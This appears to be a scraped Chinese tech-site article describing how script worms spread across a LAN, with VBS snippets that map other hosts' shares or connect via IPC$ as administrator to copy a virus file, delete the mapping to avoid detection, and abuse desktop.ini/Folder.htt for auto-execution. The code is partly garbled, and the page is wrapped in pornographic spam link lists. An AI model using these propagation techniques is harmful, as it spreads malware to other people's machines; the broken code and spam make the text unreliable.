a亚洲精品_精品国产91乱码一区二区三区_亚洲精品在线免费观看视频_欧美日韩亚洲国产综合_久久久久久久久久久成人_在线区

首頁 > 網(wǎng)管 > 局域網(wǎng) > 正文

淺析局域網(wǎng)腳本蠕蟲的傳播

2019-11-05 03:18:20
字體:
供稿:網(wǎng)友
我近日在網(wǎng)絡(luò)上看到了一些關(guān)于局域網(wǎng)腳本蠕蟲的傳播方式的一些討論,這里提供一些思路。
1. 利用WSH里的MapNetworkDrive方法。該方法是將網(wǎng)絡(luò)驅(qū)動(dòng)器映射到本地。
MapNetworkDrive方法:
object.MapNetworkDrive(strLocalName, strRemoteName, [bUpdatePRofile], [strUser], [strPassWord])
參數(shù)
object
WshNetwork 對(duì)象。
strLocalName
表示映射驅(qū)動(dòng)器的本地名的字符串值。
strRemoteName
表示共享的 UNC 名稱 (//xxx/yyy) 的字符串值。
bUpdateProfile
可選。表示映射信息是否存儲(chǔ)在當(dāng)前的用戶配置文件中的布爾值。假如提供的 bUpdateProfile 的值為 true,則該映射存儲(chǔ)在用戶的配置文件中(默認(rèn)值為 false)。
strUser
可選。表示用戶名的字符串值。假如使用當(dāng)前用戶以外的其他用戶的憑據(jù)來映射網(wǎng)絡(luò)驅(qū)動(dòng)器,則必須提供該參數(shù)。
strPassword
可選。表示用戶密碼的字符串值。假如使用當(dāng)前用戶以外的其他用戶的憑據(jù)來映射網(wǎng)絡(luò)驅(qū)動(dòng)器,則必須提供該參數(shù)。
說明
嘗試映射非共享的網(wǎng)絡(luò)驅(qū)動(dòng)器時(shí)將產(chǎn)生錯(cuò)誤。
主要原理是:得到本機(jī)的LAN地址后(一般為192.168.*.*)將其他主機(jī)的共享目錄映射為本地的驅(qū)動(dòng)器(如Z:),然后將病毒復(fù)制到映射的本地驅(qū)動(dòng)器Z:,這樣就把病毒復(fù)制到其他主機(jī)的目錄去了。最后,還要使用RemoveNetworkDrive方法刪除映射,以免被發(fā)現(xiàn)。
RemoveNetworkDrive方法:
object.RemoveNetworkDrive(strName, [bForce], [bUpdateProfile])
參數(shù)
object
WshNetwork 對(duì)象。
strName
表示要?jiǎng)h除的映射驅(qū)動(dòng)器名的字符串值。strName 參數(shù)可以是本地名稱,也可以是遠(yuǎn)程名稱,這取決于驅(qū)動(dòng)器的映射方法。
bForce
可選。表示是否強(qiáng)制刪除映射驅(qū)動(dòng)器的布爾值。假如提供的 bForce 的值為 true,則無論該資源是否正在使用,該方法都刪除這些連接。
bUpdateProfile
可選。表示是否從用戶的配置文件中刪除映射的字符串值。假如提供 bUpdateProfile 且其值為 true,則從用戶配置文件中刪除該映射。bUpdateProfile 的默認(rèn)值為 false。
說明
假如在本地名稱(驅(qū)動(dòng)器名)和遠(yuǎn)程名稱(UNC 名稱)之間存在映射關(guān)系,則 strName 必須設(shè)置為本地名稱。如網(wǎng)絡(luò)路徑中不存在本地名稱(驅(qū)動(dòng)器字母)映射,則 strName 必須設(shè)為遠(yuǎn)程名稱。
我這里給一段VBS的示例代碼:
Set myfso= CreateObject("ScrSet WshNetwork = WScript.CreateObject("WScript.Network")
WshNetwork.MapNetworkDrive "I:", "http://" & unc
fso.copyfile "c:/virus.vbs " ,"I:/virus.vbs.txt"
WshNetwork.RemoveNetworkDrive "I:"
2. 利用IPC$進(jìn)行連接。這種方式估計(jì)玩HACK的朋友比較熟悉啦!原理就是利用WSCRIPT.SHELL來執(zhí)行。具體可以參考各種IPC$攻擊傻瓜教程,這里僅提供一段代碼:
Set objshell=wscript.createobject("wscript.shell")
Dim st,sc
st="net use //" & "192.168.0.1 /IPC$ "& pass &" /" & "administrator"
objshell.run st
sc="copy c:/virus.vbs //192.168.0.1/admin$"
objshell.run sc
3. 就是像“新歡樂時(shí)光”病毒一樣的利用FOLDER.HTT的被動(dòng)式進(jìn)行傳播。
Desktop.ini: 活動(dòng)桌面的配置文件
Desktop.ini定義了它所在的文件夾在桌面上或者在資源治理器中的顯示風(fēng)格以及文件夾的某些屬性。

要害:WebViewTemplate.NT5=file://Folder.htt
就是修改desktop.ini使其指向同目錄下的folder.htt,當(dāng)以WEB視圖打開文件夾時(shí),就會(huì)按照desktop.ini里面的設(shè)置執(zhí)行folder.htt。這樣我們就可以把病毒寫入folder.htt,
使之不斷復(fù)制。
具體參見其他有關(guān)新歡樂時(shí)光的病毒分析。



發(fā)表評(píng)論 共有條評(píng)論
用戶名: 密碼:
驗(yàn)證碼: 匿名發(fā)表
主站蜘蛛池模板: 亚洲看片 | 在线免费黄色小视频 | 男人的天堂免费 | 秋霞毛片 | 精品亚洲一区二区三区 | 蜜桃免费视频 | 欧美三级 欧美一级 | 四季久久免费一区二区三区四区 | 蜜桃视频在线观看www社区 | 亚洲精品久久久日韩美女极品合集下载 | 欧洲尺码日本国产精品 | 黄色网址在线免费观看 | 成人av影片 | 超碰3| 日韩激情视频在线观看 | 日本免费成人 | 亚洲a视频 | 精品一区二区在线观看 | 在线播放国产精品 | 欧美日韩精品在线 | 久久精品国产精品青草 | 国产精品999 | 久久久国产一区 | 久久91久久久久麻豆精品 | 亚洲国产精品人人爽夜夜爽 | 日本一区二区精品视频 | 欧美亚洲一区二区三区 | 在线观看一级片 | 精品欧美一区二区精品久久久 | 国产一区二区三区免费 | 欧美一级淫片免费视频黄 | www日本com| 国产精品视频一区二区三区四蜜臂 | 97色在线视频 | 成人久久久 | 久久久.com | 亚洲 中文 欧美 日韩 在线观看 | 欧美激情视频免费观看 | 国产精品一区二区久久乐夜夜嗨 | 在线精品亚洲 | 亚洲天堂成人 |